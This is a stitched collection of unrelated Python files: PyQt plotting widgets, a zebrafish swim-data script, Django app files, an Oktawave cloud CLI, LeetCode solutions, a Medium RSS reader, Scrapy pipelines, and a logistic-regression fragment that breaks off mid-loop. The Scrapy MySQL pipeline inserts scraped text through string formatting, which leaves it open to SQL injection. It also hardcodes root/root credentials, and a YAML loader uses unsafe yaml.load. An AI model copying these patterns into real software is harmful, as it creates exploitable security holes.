line_series = LineSeries(x, __y, track, self.get_alfa_color(alfa) if self.change_color else track.color, track.name)
line_series.selected.connect(self.msd_line_clicked)
chart.addSeries(line_series)
if alfa < 0.4:
alfa_lt_0_4.append(alfa)
elif 0.4 < alfa < 1.2:
alfa_bt_0_4_1_2.append(alfa)
elif alfa > 1.2:
alfa_gt_1_2.append(alfa)
_init = np.array([.001, .01, .01])
_alfa, _velocity, _y = track.velocity_fit()
alfa_gt_1_2_n.append(_alfa)
alfa_gt_1_2_v.append(_velocity)
_line_series = LineSeries(x, _y, track, self.get_alfa_color(alfa) if self.change_color else track.color, track.name)
_line_series.selected.connect(self.msd_line_clicked)
_scattered_line = ScatterSeries(x, y, track, self.base_channel_color if self.change_color else track.color, track.name)
_scattered_line.selected.connect(self.msd_line_clicked)
chart_v.addSeries(_line_series)
chart_v.addSeries(_scattered_line)
need_velocity = True
chart_view_wrapper.chart_view.setChart(chart)
chart.createDefaultAxes()
axis_x = QValueAxis()
axis_x.setRange(0, 110)
axis_x.setTickCount(10)
axis_x.setLabelFormat("%.2f")
chart.setAxisX(axis_x)
axis_y = QValueAxis()
axis_y.setRange(0, max(max_y) + 20)
axis_y.setTickCount(10)
axis_y.setLabelFormat("%.2f")
chart.setAxisY(axis_y)
chart_view_wrapper.chart_view.setRenderHint(QtGui.QPainter.Antialiasing)
if len(tracks) > 2:
chart.legend().setVisible(False)
result = None
if need_velocity:
chart_view_w = ChartViewWrapper(self)
chart_v.createDefaultAxes()
axis_x_v = QValueAxis()
axis_x_v.setRange(0, 110)
axis_x_v.setTickCount(10)
axis_x_v.setLabelFormat("%.2f")
axis_y_v = QValueAxis()
axis_y_v.setRange(0, max(max_y) + 20)
axis_y_v.setTickCount(10)
axis_y_v.setLabelFormat("%.2f")
chart_v.setAxisX(axis_x_v)
chart_v.setAxisY(axis_y_v)
chart_view_w.chart_view.setChart(chart_v)
chart_view_w.chart_view.setRenderHint(QtGui.QPainter.Antialiasing)
result = chart_view_w
if len(tracks) > 2:
chart_v.legend().setVisible(False)
return chart_view_wrapper, result, alfa_all, alfa_lt_0_4, alfa_bt_0_4_1_2, alfa_gt_1_2, alfa_gt_1_2_n, alfa_gt_1_2_v
def get_alfa_color(self, alfa):
yellow = [255, 255, 0, 128]
cyan = [0, 183, 235, 128]
magenta= [255, 0, 255, 128]
if alfa < 0.4:
return yellow
elif 0.4 <= alfa <= 1.2:
return cyan
else:
return magenta
class AlfaWidget(QMainWindow):
track_clicked = QtCore.pyqtSignal(Track)
display_msd_channel = QtCore.pyqtSignal(Channel)
display_ied_channel = QtCore.pyqtSignal(Channel)
def __init__(self, alfa, alfa_lt_0_4, alfa_bt_0_4_1_2, alfa_gt_1_2, alfa_gt_1_2_n, alfa_gt_1_2_v, parent=None):
QMainWindow.__init__(self, parent)
self.alfa = alfa
self.alfa_lt_0_4 = alfa_lt_0_4
self.alfa_bt_0_4_1_2 = alfa_bt_0_4_1_2
self.alfa_gt_1_2 = alfa_gt_1_2
self.alfa_gt_1_2_n = alfa_gt_1_2_n
self.alfa_gt_1_2_v = alfa_gt_1_2_v
self.table_widget = QTableWidget()
self.tool_bar = self.addToolBar('Alfa ToolBar')
self.setCentralWidget(self.table_widget)
self.create_csv_act = QAction('Export')
self.create_csv_act.triggered.connect(self.export_csv)
self.tool_bar.addAction(self.create_csv_act)
self.headers = ['Alfa', 'Alfa < 0.4', 'Alfa 0.4 <> 1.2', 'Alfa > 1.2', 'New Alfa >1.2', 'Velocity']
self.prepare_table()
def prepare_table(self):
self.table_widget.setColumnCount(len(self.headers))
self.table_widget.setHorizontalHeaderLabels(self.headers)
for row, alfa in enumerate(self.alfa):
self.table_widget.setRowCount(row+1)
table_item = QTableWidgetItem(str(alfa))
self.table_widget.setItem(row, 0, table_item)
for row, alt1 in enumerate(self.alfa_lt_0_4):
if self.table_widget.rowCount() < (row +1):
self.table_widget.setRowCount(row+1)
table_item = QTableWidgetItem(str(alt1))
self.table_widget.setItem(row, 1, table_item)
for row, abt1 in enumerate(self.alfa_bt_0_4_1_2):
if self.table_widget.rowCount() < (row +1):
self.table_widget.setRowCount(row+1)
table_item = QTableWidgetItem(str(abt1))
self.table_widget.setItem(row, 2, table_item)
for row, agt1 in enumerate(self.alfa_gt_1_2):
if self.table_widget.rowCount() < (row +1):
self.table_widget.setRowCount(row+1)
table_item = QTableWidgetItem(str(agt1))
self.table_widget.setItem(row, 3, table_item)
for row, agt1n in enumerate(self.alfa_gt_1_2_n):
if self.table_widget.rowCount() < (row +1):
self.table_widget.setRowCount(row+1)
table_item = QTableWidgetItem(str(agt1n))
self.table_widget.setItem(row, 4, table_item)
for row, agt1v in enumerate(self.alfa_gt_1_2_v):
if self.table_widget.rowCount() < (row + 1):
self.table_widget.setRowCount(row + 1)
table_item = QTableWidgetItem(str(agt1v))
self.table_widget.setItem(row, 5, table_item)
def export_csv(self):
_csv = ''
# get headers 1st
_csv += ','.join(self.headers) + '\n'
# now get the data
for row in range(self.table_widget.rowCount()):
row_vals = []
for col in range(self.table_widget.columnCount()):
item = self.table_widget.item(row, col)
if item is not None:
row_vals.append(item.text())
_csv += ','.join(row_vals) + '\n'
file, _ = QFileDialog.getSaveFileName(self, "Save Curve Fit values .csv files",
QtCore.QDir.homePath(), "CSV (*.csv)")
fd = open(file, 'w')
fd.write(_csv)
fd.close()
# class MSDLineSeries(QSplineSeries):
# selected = QtCore.pyqtSignal(Track)
#
# def __init__(self, track, parent=None):
# QSplineSeries.__init__(self, parent)
# self.clicked.connect(self.__selected)
# self.hovered.connect(self.highlight)
# self.old_pen = None
# self.track = track
#
# self.y = np.array(list(track.msd(limit=26)))
# self.x = np.array(list(range(0, len(self.y) + 2))) * 3.8
#
# self.setColor(QColor(track.color[0], track.color[1], track.color[2], 255))
# self.setPen(QPen(QBrush(self.color()), 2))
# self.setName(track.name)
# for i, p in enumerate(self.y):
# self.append(self.x[i], p)
#
# def __selected(self):
# self.selected.emit(self.track)
#
# def highlight(self, _, state):
# if state:
# self.old_pen = self.pen()
# self.setPen(QPen(QtCore.Qt.black, self.old_pen.width()+2))
# elif not state and self.old_pen is not None:
# self.setPen(self.old_pen)
#
# def max_y(self):
# return self.y.max()
#
#
# class MsdChartWidget(QMainWindow):
# msd_line_clicked = QtCore.pyqtSignal(Track)
#
# def __init__(self, tracks, title=None, parent=None):
# QMainWindow.__init__(self, parent)
# self.title = title
# self.chart_view = QChartView(self)
#
# self.setCentralWidget(self.chart_view)
#
# self.tracks = tracks
# if type(tracks) is not list:
# self.tracks = [self.tracks]
#
# self.chart = QChart()
#
# self.max_y = []
#
# for track in self.tracks:
# if len(track.time_position_map) < 2:
# continue
# line_series = MSDLineSeries(track)
# line_series.selected.connect(self.msd_line_clicked)
# self.max_y.append(line_series.max_y())
# self.chart.addSeries(line_series)
#
# if len(self.tracks) < 3:
# name = '-'.join([str(n.track_id) for n in self.tracks])
# _title = f'MSD Analysis {name}'
# self.setWindowTitle(_title)
# self.chart.setTitle(_title)
# else:
# _title = self.title if self.title is not None else f'MSD Analysis'
# self.chart.setTitle(_title)
# self.chart.legend().setVisible(False)
# # self.chart.setAnimationOptions(QChart.SeriesAnimations)
#
# self.chart.createDefaultAxes()
#
# axis_x = QValueAxis()
# axis_x.setRange(0, 110)
# axis_x.setTickCount(10)
# axis_x.setLabelFormat("%.2f")
# self.chart.setAxisX(axis_x)
#
# axis_y = QValueAxis()
# axis_y.setRange(0, max(self.max_y)+20)
# axis_y.setTickCount(10)
# axis_y.setLabelFormat("%.2f")
# self.chart.setAxisY(axis_y)
#
# self.chart_view.setChart(self.chart)
# self.chart_view.setRenderHint(QtGui.QPainter.Antialiasing)
#
# self.tool_bar = self.addToolBar('MSDToolBar')
#
# self.setup_tool_bar()
# self.setSizePolicy(QSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding))
#
# def setup_tool_bar(self):
# save_image_action = QAction('Export SVG', self)
# save_image_action.triggered.connect(self.save_svg)
# self.tool_bar.addAction(save_image_action)
#
# def save_svg(self):
# file, _ = QFileDialog.getSaveFileName(self, "Save Dialog for Export SVG", QtCore.QDir.homePath(), "SVG (*.svg)")
#
# if not file:
# return
#
# target_react = QtCore.QRectF(0.0, 0.0, self.chart_view.sceneRect().size().width(), self.chart_view.sceneRect().size().height());
# svg_generator = QSvgGenerator()
# svg_generator.setFileName(file)
# svg_generator.setSize(self.chart_view.sceneRect().size().toSize())
# svg_generator.setViewBox(self.chart_view.sceneRect())
#
# painter = QtGui.QPainter(svg_generator)
# self.chart_view.render(painter, target_react, self.chart_view.sceneRect().toRect())
# painter.end()
#
# def sizeHint(self):
# return QSize(400, 400) |
from get_fish_info import get_fish_info
import pandas as pd
from pathlib import Path
import pylab as pl
import pickle
import numpy as np
root_path = Path("/n/home10/abahl/engert_storage_armin/ariel_paper/free_swimming_behavior_data/dot_motion_coherence")
for experiment in ["chrna2a",
"disc1_hetinx",
"scn1lab_NIBR_20200708",
"scn1lab_zirc_20200710"]:
if experiment == "chrna2a":
fish_data = pd.read_excel(root_path / experiment / "genotype.xlsx", header=None)
fish_data.columns = ['fish_ID', "genotype"]
if experiment == "disc1_hetinx":
fish_data = pd.read_excel(root_path / experiment / "genotype.xlsx", header=None)
fish_data.columns = ['fish_ID', "genotype"]
if experiment == "scn1lab_NIBR_20200708":
fish_data = pd.read_excel(root_path / experiment / "genotype.xlsx", header=0)
fish_data.columns = ['fish_ID', "pre_genotype", "genotype"] # the post genotype is the correct one
if experiment == "scn1lab_zirc_20200710":
fish_data = pd.read_excel(root_path / experiment / "genotype.xlsx", header=0)
fish_data.columns = ['fish_ID', "pre_genotype", "genotype"]
print(fish_data)
# if experiment == "scn1lab_NIBR_20200708":
# fish_data.columns = ['fish_ID', "genotype"]
# if len(fish_data.columns) == 2:
# fish_data.columns = ['fish_ID', "genotype"]
# else:
# fish_data.columns = ['fish_ID', "genotype", "take"]
all_data = []
numtrials = 30
for i in range(len(fish_data)):
fish_ID = fish_data.iloc[i]["fish_ID"]
genotype = fish_data.iloc[i]["genotype"]
# take = fish_data.loc[i]["take"]
if genotype == "wt" or "+/+" in genotype:
genotype = 'wt'
elif genotype == "ht" or "+/-" in genotype:
genotype = 'het'
elif genotype == "hm" or "-/-" in genotype:
genotype = 'hom'
else:
print(fish_ID, genotype, "unknown genotype. Skipping.")
# if len(fish_data.columns) == 3:
# if fish_data.loc[i]["take"] == 0:
# print(fish_ID, genotype, "ignore fish (not good swimming?).")
# continue
for trial in range(0, numtrials):
print(experiment, fish_ID, genotype, trial)
try:
f = open(root_path / experiment / fish_ID / "raw_data" / f"trial{trial:03d}.dat", 'rb')
data = pickle.load(f)
f.close()
except:
break
for stim in range(8):
bout_times = data[f"bouts_start_stimulus_{stim:03d}"]["timestamp"]
bout_xs = data[f"bouts_start_stimulus_{stim:03d}"]["fish_position_x"]
bout_ys = data[f"bouts_start_stimulus_{stim:03d}"]["fish_position_y"]
bout_start_fish_accumulated_orientation = data[f"bouts_start_stimulus_{stim:03d}"][
"fish_accumulated_orientation"]
bout_end_fish_accumulated_orientation = data[f"bouts_end_stimulus_{stim:03d}"][
"fish_accumulated_orientation"]
heading_angle_changes = bout_end_fish_accumulated_orientation - bout_start_fish_accumulated_orientation
# Turn responses to left-ward motion the after way around
if stim in [0, 1, 2, 3]:
heading_angle_changes = -heading_angle_changes
for i in range(1, len(bout_times)):
all_data.append([fish_ID,
genotype,
trial,
stim % 4,
bout_times[i],
bout_xs[i],
bout_ys[i],
bout_times[i] - bout_times[i - 1],
heading_angle_changes[i],
np.sign(heading_angle_changes[i]) == np.sign(heading_angle_changes[i - 1])])
df = pd.DataFrame(all_data, columns=["fish_ID",
"genotype",
"trial",
"stim",
"bout_time",
"bout_x",
"bout_y",
"inter_bout_interval",
"heading_angle_change",
"same_as_previous"]).astype(dtype={"trial": "int64",
"stim": "int64",
"same_as_previous": "bool"}, copy=False)
df.set_index(['fish_ID', "genotype", 'trial', 'stim'], inplace=True)
df.sort_index(inplace=True)
df.to_hdf(root_path / experiment / "all_data.h5", key="all_bouts", complevel=9)
# Extract behavioral features
df_extracted_features, df_extracted_binned_features, \
df_extracted_binned_features_same_direction, \
df_extracted_binned_features_heading_angle_change_histograms, \
df_extracted_binned_features_inter_bout_interval_histograms, \
df_gmm_fitting_results = get_fish_info(df)
df_extracted_features.to_hdf(root_path / experiment / "all_data.h5", key="extracted_features", complevel=9)
df_extracted_binned_features.to_hdf(root_path / experiment / "all_data.h5", key="extracted_binned_features", complevel=9)
df_extracted_binned_features_same_direction.to_hdf(root_path / experiment / "all_data.h5", key="extracted_binned_features_same_direction", complevel=9)
df_extracted_binned_features_heading_angle_change_histograms.to_hdf(root_path / experiment / "all_data.h5", key="extracted_binned_features_heading_angle_change_histograms", complevel=9)
df_extracted_binned_features_inter_bout_interval_histograms.to_hdf(root_path / experiment / "all_data.h5", key="extracted_binned_features_inter_bout_interval_histograms", complevel=9)
df_gmm_fitting_results.to_hdf(root_path / experiment / "all_data.h5", key="gmm_fitting_results", complevel=9)
|
# Generated by Django 2.2.10 on 2020-08-03 07:17
import datetime
from django.db import migrations, models
from django.utils.timezone import utc
class Migration(migrations.Migration):
dependencies = [
('school', '0035_auto_20200803_1232'),
]
operations = [
migrations.AlterField(model_name='attendance', name='date', field=models.DateField(default=datetime.datetime(2020, 8, 3, 7, 17, 35, 877693, tzinfo=utc)),),
migrations.AlterField(model_name='wastage', name='date', field=models.DateField(default=datetime.datetime(2020, 8, 3, 7, 17, 35, 875648, tzinfo=utc)),),
]
|
# Generated by Django 3.0.5 on 2020-05-09 10:45
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('med_result', '0005_auto_20200509_1038'),
('visit', '0009_auto_20200509_1242'),
]
operations = [
migrations.RemoveField(
model_name='visit',
name='med_result',
),
migrations.AddField(
model_name='visit',
name='med_result',
field=models.ManyToManyField(blank=True, to='med_result.MedResult'),
),
]
|
from django.contrib import admin
from django.urls import path,include
from django.conf import settings
from django.conf.urls.static import static
from two_factor.urls import urlpatterns as tf_urls
from django.conf.urls import url
from two_factor.gateways.twilio.urls import urlpatterns as tf_twilio_urls
#Custom admin page header
admin.site.site_header = 'Photoshop Battles Admin'
urlpatterns = [
url(r'', include(tf_twilio_urls)),
url(r'', include(tf_urls)),
path('admin/', admin.site.urls),
path('',include('application.urls',namespace='application')),
path('',include('accounts.urls'))
]
if settings.DEBUG:
urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT) |
from django.shortcuts import render , redirect
from .models import Profile
from .forms import ProfileForm
from django.http import Http404
from django.contrib.auth import get_user_model
# Create your views here.
User = get_user_model()
def update_profile_view(request, *args, **kwargs):
if not request.user.is_authenticated:
return redirect("/login?next=/profile/update/")
user = request.user
user_data = {
"first_name" : user.first_name,
"last_name" : user.last_name,
"email" : user.email
}
profile = user.profile
form = ProfileForm(request.POST or None , instance = profile, initial = user_data)
if form.is_valid():
form.save(commit = False)
first_name = form.cleaned_data.get('first_name')
last_name = form.cleaned_data.get('last_name')
email = form.cleaned_data.get('email')
user.first_name= first_name
user.last_name = last_name
user.email = email
user.save()
profile.save() # bio and location
return redirect("/")
context = {
'form' : form,
'btn_label' : 'update profile',
'title' : 'Update Profile'
}
return render(request , "profiles/updateProfile.html", context)
def profile_detail_view(request, username, *args, **kwargs):
# get the profile for the passed username
qs = Profile.objects.filter(user__username=username)
if not qs.exists():
raise Http404
profile_obj = qs.first()
is_following = False
if request.user.is_authenticated:
user = request.user
is_following = user in profile_obj.followers.all()
# is_following = profile_obj in user.following.all()
context = {
"username": username,
"profile": profile_obj,
"is_following": is_following
}
return render(request, "profiles/profileDetail.html", context)
|
import typer
import pyodk
import logging
from pyodk.rest import ApiException
import configparser
import sys
import click
import time
import progressbar
import subprocess
from oktawave_cli.lib.oci import OciHelper
from oktawave_cli.lib.subregion import SubregionHelper
from oktawave_cli.lib.tickets import TicketHelper
from oktawave_cli.common import Api
from oktawave_cli.utils import pretty_print_output, show_progress_from_ticket
logger = logging.getLogger(__name__)
pass_api = click.make_pass_decorator(Api, ensure=True)
@click.group()
@pass_api
def oci(api):
"""Manage Oktawave Cloud Instances"""
@oci.command("list")
@pass_api
def oci_list(api):
"""Gets OCI list."""
oci_helper = OciHelper(api.api_client)
instances = oci_helper.get_oci_list()
output = []
column_names = ["Name", "ID", "Status", "IP", "Class"]
for instance in instances:
instance_data = [instance.name, instance.id, instance.status.label,
instance.ip_address, instance.type.label]
output.append(instance_data)
pretty_print_output(column_names, output)
@oci.command("get")
@click.option("--name", help="Name of instance")
@click.option("--oci-id", type=int, help="Id of instance")
@pass_api
def oci_get(api, name, oci_id):
"""Get OCI."""
column_names = ["Name", "ID", "IP", "Class"]
output = []
if not name and not oci_id:
click.echo("You must provide name or id of oci")
return -1
oci_helper = OciHelper(api.api_client)
if oci_id:
instance = oci_helper.get_oci_by_id(oci_id)
instance_data = [[instance.name, instance.id, instance.ip_address,
instance.type.label]]
pretty_print_output(column_names, instance_data)
return 0
instances = oci_helper.get_oci(oci_name=name)
output = []
if instances:
for instance in instances:
instance_data = [instance.name, instance.id]
output.append(instance_data)
pretty_print_output(column_names, output)
else:
click.echo(f"Could not find instance with name: {name}")
@oci.command("types")
@pass_api
@click.option("--order-by", default="CPU",
help="Available orders are: Category, Cpu, Ram, Name. Default=CPU")
def get_oci_types(api, order_by):
"""Print available OCI types(class)."""
column_names = ["Name", "ID", "CPU", "RAM", "Category"]
oci_helper = OciHelper(api.api_client)
if order_by.lower() not in ('cpu', 'ram', 'name', 'category', 'none'):
click.echo("You can order only by: CPU, RAM, Name, Category or None")
if order_by.lower() == 'none':
returned_types = oci_helper.get_instances_types(order_by=None)
else:
returned_types = oci_helper.get_instances_types(order_by=order_by)
output = []
for oci_type in returned_types:
type_data = [oci_type.name, oci_type.id,
oci_type.cpu, oci_type.ram,
oci_type.category.label]
output.append(type_data)
pretty_print_output(column_names, output)
@oci.command("templates")
@pass_api
def templates_list(api):
"""List of available templates."""
columns = ['Name', 'ID', 'System Category', "Owner Account"]
oci_helper = OciHelper(api.api_client)
templates = oci_helper.get_templates()
output = []
for template in templates:
template_data = [template.name, template.id,
template.system_category.label,
template.owner_account]
output.append(template_data)
pretty_print_output(columns, output)
@oci.command("create")
@pass_api
@click.option("--name", help="Name for created OCI", required=True)
@click.option("--template-id", type=int, help="Template id", required=True)
@click.option("--authorization-method", default="ssh", help="Authorization method. SSH or Password")
@click.option("--disk-class", help="Type 48 for Tier1, 49 for Tier2, 50 for Tier3, 895 for Tier4, 896 for Tier5")
@click.option("--disk-size", type=int, help="Initial disk size")
@click.option("--ip-address-id", help="Public IP id. Create OCI with given ip")
@click.option("--ssh-key", help="IDs of ssh keys", multiple=True)
@click.option("--subregion", help="Subregion name in which create OCI for example: PL-001")
@click.option("--type-id", default=1047, type=int, help="Instance Type")
@click.option("--init-script", help="Location of puppet manifiest to send to OCI")
@click.option("--without-publicip", is_flag=True, help="Create OCI whitout public IP")
@click.option("--count", type=int, help="Count of instances to create")
def oci_create(api, name, template_id, authorization_method,
disk_class, disk_size, ip_address_id, ssh_key, subregion, type_id,
init_script, without_publicip, count):
"""Create OCI."""
args_dict = {}
if authorization_method.lower() == 'ssh' and not ssh_key:
click.echo("You need provide ssh-keys to add")
sys.exit(-1)
if without_publicip and ip_address_id != 0:
click.echo("Bad options, don't use --without-publicip flag with --ip-address")
sys.exit(-1)
if authorization_method.lower() == 'ssh':
authorization_method_id = 1398
key_ids = list(ssh_key)
args_dict['ssh_keys_ids'] = key_ids
elif authorization_method.lower() == 'password':
authorization_method_id = 1399
args_dict['authorization_method_id'] = authorization_method_id
# find subregion
if subregion:
subregion_name = subregion.lower()
subregion_helper = SubregionHelper(api.api_client)
api_subregions = subregion_helper.get_subregions()
found = False
for api_subregion in api_subregions.items:
if api_subregion.name.lower() == subregion_name:
found = True
if not api_subregion.is_active:
click.echo("Given subregion is not active")
sys.exit(-1)
args_dict['subregion_id'] = api_subregion.id
if not found:
click.echo(f"There is no such subregion: {subregion}")
sys.exit(-1)
# set disk size
if disk_size:
args_dict['disk_size'] = disk_size
if type_id:
args_dict['type_id'] = type_id
if count:
args_dict['instances_count'] = count
args_dict['template_id'] = template_id
oci_helper = OciHelper(api.api_client)
resp = oci_helper.create_oci(name, **args_dict)
if not resp:
click.echo("Problem with creating OCI")
sys.exit(-1)
ticket_helper = TicketHelper(api.api_client)
click.echo("Creating OCI in progress...")
show_progress_from_ticket(resp, ticket_helper)
ticket = ticket_helper.get_ticket(resp.id)
if ticket.status.id == 137:
click.echo("Error while creating OCI")
else:
click.echo("Successful created OCI")
@oci.command("reboot")
@pass_api
@click.option("--id", 'oci_id', type=int, help="Id of OCI")
@click.option("--force", help="Reboot without confirm")
def oci_reboot(api, oci_id, force):
"""Will try to soft(warm) reboot OCI."""
if not id:
click.echo("You need to provide OCI id.")
oci_helper = OciHelper(api.api_client)
instance = oci_helper.get_oci_by_id(oci_id=oci_id)
if not force:
if not click.confirm(f"Are you really want to reboot OCI {instance.name}?"):
click.echo("Aborting")
sys.exit(-1)
resp = oci_helper.reboot_oci(oci_id=oci_id)
if resp:
ticket_helper = TicketHelper(api.api_client)
ticket_id = resp.id
ticket = ticket_helper.get_ticket(ticket_id)
with click.progressbar(length=100) as progress_bar:
click.echo("Rebooting OCI in progress...")
while ticket.status.id == 135 and ticket.progress != 100:
ticket = ticket_helper.get_ticket(ticket_id)
progress_bar.update(ticket.progress)
if ticket.status.id == 136:
click.echo("Successful rebooted OCI")
else:
click.echo("Error while soft rebooting OCI.")
@oci.command("restart")
@pass_api
@click.option("--id", 'oci_id', type=int, help="Id of OCI")
@click.option("--name", 'oci_name', type=int, help="Id of OCI")
@click.option("--force", help="Restart without confirm")
def oci_restart(api, oci_id, oci_name, force):
"""Hard restart OCI."""
if not id:
click.echo("You need to provide OCI id.")
oci_helper = OciHelper(api.api_client)
instance = oci_helper.get_oci_by_id(oci_id=oci_id)
if not force:
click.confirm(f"Are you really want to restart OCI {instance.name}?")
resp = oci_helper.restart_oci(oci_id=oci_id)
if resp:
ticket_helper = TicketHelper(api.api_client)
ticket_id = resp.id
ticket = ticket_helper.get_ticket(ticket_id)
with click.progressbar(length=100) as progress_bar:
click.echo("Restarting OCI in progress...")
while ticket.status.id == 135 and ticket.progress != 100:
ticket = ticket_helper.get_ticket(ticket_id)
progress_bar.update(ticket.progress)
if ticket.status.id == 136:
click.echo("Successful restarted OCI")
else:
click.echo("Error while soft restarting OCI.")
@oci.command("poweron")
@pass_api
@click.option("--id", 'oci_id', type=int, help="Id of OCI")
@click.option("--name", 'oci_name', help="Name of OCI")
def oci_poweron(api, oci_id, oci_name):
""" PowerOn OCI."""
if not id:
click.echo("You need to provide OCI id.")
oci_helper = OciHelper(api.api_client)
resp = oci_helper.poweron_oci(oci_id=oci_id)
if resp:
ticket_helper = TicketHelper(api.api_client)
ticket_id = resp.id
ticket = ticket_helper.get_ticket(ticket_id)
with progressbar.ProgressBar(max_value=100) as progress_bar:
click.echo("Power on OCI in progress...")
while ticket.status.id == 135 and ticket.progress != 100:
ticket = ticket_helper.get_ticket(ticket_id)
progress_bar.update(ticket.progress)
if ticket.status.id == 136:
click.echo("Successful powered on OCI")
else:
click.echo("Error while powering on OCI.")
@oci.command("poweroff")
@pass_api
@click.option("--id", 'oci_id', type=int, required=True, help="Id of OCI")
@click.option("--force", is_flag=True, help="Force poweroff OCI")
def oci_poweroff(api, oci_id, force):
""" PowerOff OCI."""
oci_helper = OciHelper(api.api_client)
instance = oci_helper.get_oci_by_id(oci_id=oci_id)
if not force:
if not click.confirm(f"Are you really want to poweroff OCI {instance.name}?"):
click.echo("Aborting")
sys.exit(-1)
resp = oci_helper.poweron_oci(oci_id=oci_id)
if resp:
ticket_helper = TicketHelper(api.api_client)
ticket_id = resp.id
ticket = ticket_helper.get_ticket(ticket_id)
with click.progressbar(length=100) as progress_bar:
click.echo("Poweroff OCI in progress...")
while ticket.status.id == 135 and ticket.progress != 100:
ticket = ticket_helper.get_ticket(ticket_id)
progress_bar.update(ticket.progress)
if ticket.status.id == 136:
click.echo("Successful powered off OCI")
else:
click.echo("Error while powering off OCI.")
@oci.command("delete")
@pass_api
@click.option("--id", "oci_id", type=int, required=True, help="Id of OCI")
@click.option("--force", is_flag=True, help="Delete without confirm")
@click.option("--deep", is_flag=True, help="Delete OCI with all attached OVS")
def oci_delete(api, oci_id, force, deep):
"""Delete OCI."""
if not force:
if not click.confirm("Are you sure?"):
click.echo("Aborting")
sys.exit(-1)
oci_helper = OciHelper(api.api_client)
status = oci_helper.delete_oci(oci_id=oci_id, deep=deep)
if not status:
click.echo("Problem with deleting OCI.")
sys.exit(-1)
if status:
click.echo("Successful deleted OCI")
else:
click.echo("Error while deleting OCI")
@oci.command("ssh")
@pass_api
@click.option("--id", "oci_id", type=int, required=True, help="Id of OCI")
@click.option("--login", help="Use login for connection")
def oci_ssh(api, oci_id, login):
"""Connect to OCI by ssh."""
oci_helper = OciHelper(api.api_client)
dns_name = oci_helper.get_dns_name(oci_id)
if not dns_name:
click.echo("Could not get DNS Name for OCI")
sys.exit(-1)
where = f"root@{dns_name}"
subprocess.call(['ssh', where])
|
import json
import os
import yaml
def load_data(file_name):
#获取上一级目录
# print(os.path.abspath(os.path.join(os.getcwd(), "..")))
file_path = os.getcwd() + os.sep + "configure" + os.sep + file_name + ".yml"
file = open(file_path, 'r', encoding='utf-8')
data = yaml.load(file)
return data
if __name__ == '__main__':
da = load_data("order_data") |
# Definition for a binary tree node.
# class TreeNode(object):
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution(object):
def levelOrderBottom(self, root):
"""
okay 56ms 80%
:type root: TreeNode
:rtype: List[List[int]]
"""
self.lt = []
self.traverse(root, 0)
self.lt.reverse()
return self.lt
def traverse(self, node, level):
if not node:
return None
if len(self.lt) == level:
self.lt.append([])
self.traverse(node.left, level+1)
self.traverse(node.right, level+1)
self.lt[level].append(node.val)
class Solution1(object):
def levelOrderBottom(self, root):
"""
nice 52ms 91%
Using if before calling a function
:type root: TreeNode
:rtype: List[List[int]]
"""
self.lt = []
if not root:
return None
self.traverse(root, 0)
self.lt.reverse()
return self.lt
def traverse(self, node, level):
if len(self.lt) == level:
self.lt.append([])
self.lt[level].append(node.val)
if node.left:
self.traverse(node.left, level+1)
if node.right:
self.traverse(node.right, level+1)
# print Solution().levelOrderBottom()
#eof
|
import requests
import feedparser
from bs4 import BeautifulSoup
from alfheimproject.settings import CONFIG
def get_medium_posts():
page = requests.get("https://medium.com/feed/@{user}".format(user=CONFIG['api']['medium']['username']))
rss = feedparser.parse(page.content)
posts = []
for i, post in enumerate(rss.entries):
soup = BeautifulSoup(post.summary, "html.parser")
new_post = {
"title": post.title,
"img_url": soup.find("img")["src"],
"summary": soup.find("p").text,
"published": post.published,
"link": post.link
}
if "https://cdn-images-1.medium.com" in soup.find("img")["src"]:
posts.append(new_post)
return posts
|
# Define your item pipelines here
#
# Don't forget to add your pipeline to the ITEM_PIPELINES setting
# See: https://docs.scrapy.org/en/latest/topics/item-pipeline.html
# useful for handling different item types with a single interface
from itemadapter import ItemAdapter
class QiushibaikePipeline (object):
fp = None
def open_spider(self, spider):
print('开始爬虫……')
self.fp = open('./qiushi.txt','w',encoding='utf-8')
def process_item(self, item, spider):
author = item['author']
page_text = item['page_text']
# if type(author)=='NoneType' or type(page_text) == 'NoneType':
# author = '匿名用户'
# page_text = ''
print(author,page_text)
self.fp.write(author + ':' + page_text)
return item #这个item回传给下一个管道类
def close_spider(self,spider):
print('结束爬虫.')
self.fp.close()
import pymysql
#管道文件中一个管道类将一组数据存储到一个平台或载体中
class mysqlQiushibaikePipeline (object):
conn = None
cur = None
def open_spider(self, spider):
print('开始存入数据库……')
self.conn = pymysql.connect(host = '127.0.0.1',port=3306,user='root',password='root',db='python',charset='utf8')
def process_item(self, item, spider):
#打开游标
self.cur = self.conn.cursor()
#插入值
try:
self.cur.execute('insert into qiushi VALUES ("%s","%s")'%(item['author'],item['page_text']))
self.conn.commit()
except Exception as e:
print(e)
self.conn.rollback()
# author = item['author']
# page_text = item['page_text']
return item # 这个item回传给下一个管道类
def close_spider(self, spider):
print('存入数据库完成.')
self.cur.close()
self.conn.close() |
import sys
input = sys.stdin.readline
sys.setrecursionlimit(10 ** 7)
k, n = list(map(int, input().split()))
a = list(map(int, input().split()))
diff = [0] * n
for i in range(len(a) - 1):
diff[i] = abs(a[i] - a[i+1])
diff[-1] = abs(a[-1] - k) + a[0]
print(k - max(diff))
|
def ais(a):
g = []
for i, j in zip(a, a[1:]):
if i > j:
g.append('>')
elif i < j:
g.append('<')
elif i == j:
g.append('=')
print(g)
print(len(a))
print(len(g))
s = [40, 50, 60, 10, 20, 30]
ais(s)
|
import skimage
from lr_utils import load_dataset
import numpy as np
import matplotlib.pyplot as plt
from PIL import Image
"""
w.shape = (dim, 1)
X.shape = (px * px * 3, num_of_pic)
Y.shape = (1, ...)
"""
# sigmoid函数
def sigmoid(z):
return 1 / (1 + np.exp(-z))
# 初始化
def initialize_with_zeros(dim):
w = np.zeros((dim, 1))
b = 0
return w, b
# 前向传播
def propagate(w, b, X, Y):
A = sigmoid(np.dot(w.T, X) + b)
m = X.shape[1]
cost = np.sum(np.dot(Y, np.log(A).T) + np.dot(1 - Y, np.log(1 - A).T)) / (-m)
dw = np.dot(X, (A - Y).T) / m
db = np.sum(A - Y) / m
return cost, dw, db
# 梯度下降
def optimize(w, b, X, Y, num_iterations, learning_rate, print_cost=False):
costs = []
for i in range(num_iterations):
cost, dw, db = propagate(w, b, X, Y)
w = w - learning_rate * dw
b = b - learning_rate * db
